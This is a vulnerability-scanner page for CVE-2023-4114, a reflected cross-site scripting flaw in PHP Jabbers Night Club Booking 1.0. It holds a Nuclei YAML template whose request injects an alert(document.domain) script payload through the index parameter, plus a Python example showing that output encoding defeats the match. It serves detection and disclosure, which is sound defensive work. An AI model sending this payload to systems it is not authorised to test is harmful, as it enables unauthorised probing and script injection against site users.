PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting
ID: CVE-2023-4114
Severity: medium
Author: r3Y3r53
Tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers
Description
A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
YAML Source
```yaml
id: CVE-2023-4114

info:
  name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39749
    - http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4114
    - https://vuldb.com/?ctiid.235961
    - https://vuldb.com/?id.235961
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4114
    cwe-id: CWE-79
    epss-score: 0.00401
    epss-percentile: 0.73538
    cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpjabbers
    product: night_club_booking_software
  tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "Drinks & Extras", "Checkout", "><script>alert(document.domain)</script>")'
        condition: and
# digest: 4b0a00483046022100cc825e9e0fb230abf60b357235149cdf1cc48631cfed2849d6a6daa38bdc06ce022100ed37fbf5bdcf9871d6bbdeb4847b3970a57f6af6528fba2e2a404ec4fa5af1a1:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4114.yaml"
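The three DSL conditions in the template's matcher, re-implemented in Python to show which responses count as a finding and why output encoding of `index` clears it. This is an added example, not part of the original template or of Nuclei; `render_search_page` and its responses are constructed, and echoing `index` into a double-quoted attribute is an assumption drawn from the payload's leading `">`.

```python
import html

# The template's `index` argument after URL decoding.
PAYLOAD = '"><script>alert(document.domain)</script>'
# Strings the matcher's contains_all() requires in the response body.
MARKERS = ("Drinks & Extras", "Checkout", "><script>alert(document.domain)</script>")


def template_matches(status_code, content_type, body):
    """Mirror of the three DSL lines, joined by `condition: and`."""
    return (
        status_code == 200
        and "text/html" in content_type
        and all(marker in body for marker in MARKERS)
    )


def render_search_page(index_value, escape):
    """Constructed stand-in for the search page (not the vendor's code).

    Assumption: `index` is echoed into a double-quoted HTML attribute.
    """
    value = html.escape(index_value, quote=True) if escape else index_value
    return (
        "<html><body><h2>Drinks & Extras</h2>"
        f'<input type="hidden" name="index" value="{value}">'
        '<a href="#">Checkout</a></body></html>'
    )


def scan_results():
    """Evaluate the matcher against four constructed responses."""
    raw = render_search_page(PAYLOAD, escape=False)
    encoded = render_search_page(PAYLOAD, escape=True)
    html_type = "text/html; charset=utf-8"
    return {
        # Payload reflected verbatim in an HTML page: reported.
        "unescaped_html": template_matches(200, html_type, raw),
        # Same page with the value HTML-encoded: the raw marker is gone.
        "escaped_html": template_matches(200, html_type, encoded),
        # Verbatim reflection in a non-HTML response is not reported.
        "unescaped_json": template_matches(200, "application/json", raw),
        # Non-200 responses are ignored even if the payload is echoed.
        "error_page": template_matches(500, html_type, raw),
    }


if __name__ == "__main__":
    for name, hit in scan_results().items():
        print(f"{name:15} -> {'match' if hit else 'no match'}")
```
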